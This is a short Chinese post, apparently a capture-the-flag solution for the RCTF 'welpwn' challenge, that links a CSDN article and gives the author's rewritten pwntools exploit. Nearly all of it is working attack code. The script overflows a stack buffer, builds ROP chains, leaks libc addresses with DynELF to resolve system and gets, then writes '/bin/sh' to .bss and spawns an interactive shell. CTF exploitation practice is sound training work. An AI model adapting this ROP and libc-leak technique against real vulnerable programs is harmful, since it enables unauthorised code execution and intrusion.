https://blog.csdn.net/u011987514/article/details/70232881

按照自己习惯,代码重写一下:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

io = process("./welpwn")

#gadgets
p4r = 0x40089C
pr = 0x4008A3
main = 0x4007CD
puts = 0x4005A0
bss = 0x601070

io.recvuntil("RCTF\n")
def leak(addr):
    payload = "A" * 16 + "B" * 8
    rop = p64(pr) + p64(addr) + p64(puts) + p64(main)
    payload += p64(p4r) + rop
    io.sendline(payload)
    io.recv(27)
    tmp = io.recv()
    data = tmp.split("\nWelcome")[0]
    if len(data):
        return data
    else:
        return "\x00"

d = DynELF(leak, elf = ELF("./welpwn"))
system = d.lookup("system", "libc")
log.info("system addr = " + hex(system))
gets = d.lookup("gets", "libc")
log.info("gets addr = " + hex(gets))

rop = p64(pr) + p64(bss) + p64(gets) + p64(pr) + p64(bss) + p64(system) + p64(0)
payload = "A" * 16 + "B" * 8 + p64(p4r) + rop
io.sendline(payload)
io.sendline("/bin/sh\x00")
io.interactive()